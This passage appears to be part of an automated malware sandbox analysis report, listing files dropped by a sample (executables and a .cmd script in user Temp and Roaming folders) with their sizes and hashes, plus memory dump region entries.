                56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

              • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe

                Filesize

                614KB

                MD5

                88696cf17417a2339b63f9452404c839

                SHA1

                2123ca0e3764ba65e421d3b5dd7453da955d36f2

                SHA256

                a5f629e62e8012c0ead81b462bc05ec9d20395af3121f87961f9d2dfde908895

                SHA512

                a4236f6d52b985420dc733998842815fd24f12236bdbf3b885ed9a15c0d4815dec439cf919925b4b903ac158aba1ba2a8bf9eff20af7134d2e4edbce226f7931

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmbjd34e.ylk.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp

                Filesize

                1KB

                MD5

                7f90f475aa13b8540625a0f2f6c5cb87

                SHA1

                aa27ff559a0ceb702c9acd3215fa9d8f1bf4ad18

                SHA256

                aad12eaef3d9e22bbde72db89ca3dbdd7adf278042ea0ecbb9013302993481a0

                SHA512

                0f484824f1f72abc0f3adc20473e2f20afee0a17cce13bc04a5ba1f3a64b514e0e87dafbd4adb4fe664dd28c6d533e1f264e15fca93d68965aa99784f526e6f2

              • C:\Users\Admin\AppData\Roaming\efthfxj.exe

                Filesize

                251KB

                MD5

                dcb591d1fc03274934709e24b502d719

                SHA1

                9d4172d007347a9aa54b48cb5a214a792ad03708

                SHA256

                c7e67928407dc0d2fe2a61e10e2f97104986770b6ba6e59f8faa7b6fcc595028

                SHA512

                1d6748bdd0bbfbe4d1f15dde0af015fb08814ffc3360b215d4f56844b15ae1d4b29ade922678439c3a07f1fa41da287a1054b0eb5853a761ae2fabb4b08b2800

              • C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exe

                Filesize

                474KB

                MD5

                642a150be5bbed12c85dff794b955c01

                SHA1

                115de36f192e2bb10ec7c2c8bba9bf3dd639b461

                SHA256

                ded2b1a499ba8ac097361b01b1e56bdaa67769c0b7130489af489bef58cb5dfc

                SHA512

                d4a8249bc53bd070bfb8c0cdd703980ac4b12e0a0354a31333d7bf0af089edc1317c3005e99cdd3247b883ce72d10158e928d54664941010ee884fb4a5b1ce42

              • C:\Users\Admin\AppData\Roaming\eystsdf.cmd

                Filesize

                18KB

                MD5

                fa0fdc18cccb4a2fb162362848d10d73

                SHA1

                9ccab8577c310e19e1299fb7fcad538c72a36420

                SHA256

                c3f004c34695080e75df6dccc39dae9e269eba7164aa0f95b9964078973f3736

                SHA512

                fcce03713d22d8831cb8f792c9e367aeb4d3714ffb89f148f2b64ae32bb066f7ab0b5ea58778309a86584af8169a75bb7325ba6505567881bd330cdead222fd3

              • memory/1816-14-0x00007FF9BB040000-0x00007FF9BBB01000-memory.dmp

                Filesize

                10.8MB

              • memory/1816-23-0x00007FF9BB040000-0x00007FF9BBB01000-memory.dmp

                Filesize

                10.8MB

              • memory/1816-2-0x00007FF9BB043000-0x00007FF9BB045000-memory.dmp

                Filesize

                8KB

              • memory/1816-13-0x00007FF9BB040000-0x00007FF9BBB01000-memory.dmp

                Filesize

                10.8MB

              • memory/1816-12-0x000001A4EE5E0000-0x000001A4EE602000-memory.dmp

                Filesize

                136KB

              • memory/4852-54-0x0000000000400000-0x0000000000412000-memory.dmp

                Filesize

                72KB

              • memory/5116-47-0x0000000000DA0000-0x0000000000DE8000-memory.dmp

                Filesize

                288KB

              • memory/5116-48-0x0000000003180000-0x0000000003186000-memory.dmp

                Filesize

                24KB

              • memory/5116-49-0x00000000031B0000-0x00000000031F2000-memory.dmp

                Filesize

                264KB

              • memory/5116-50-0x0000000005950000-0x00000000059EC000-memory.dmp

                Filesize

                624KB

              • memory/5116-51-0x00000000031F0000-0x00000000031F6000-memory.dmp

                Filesize

                24KB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.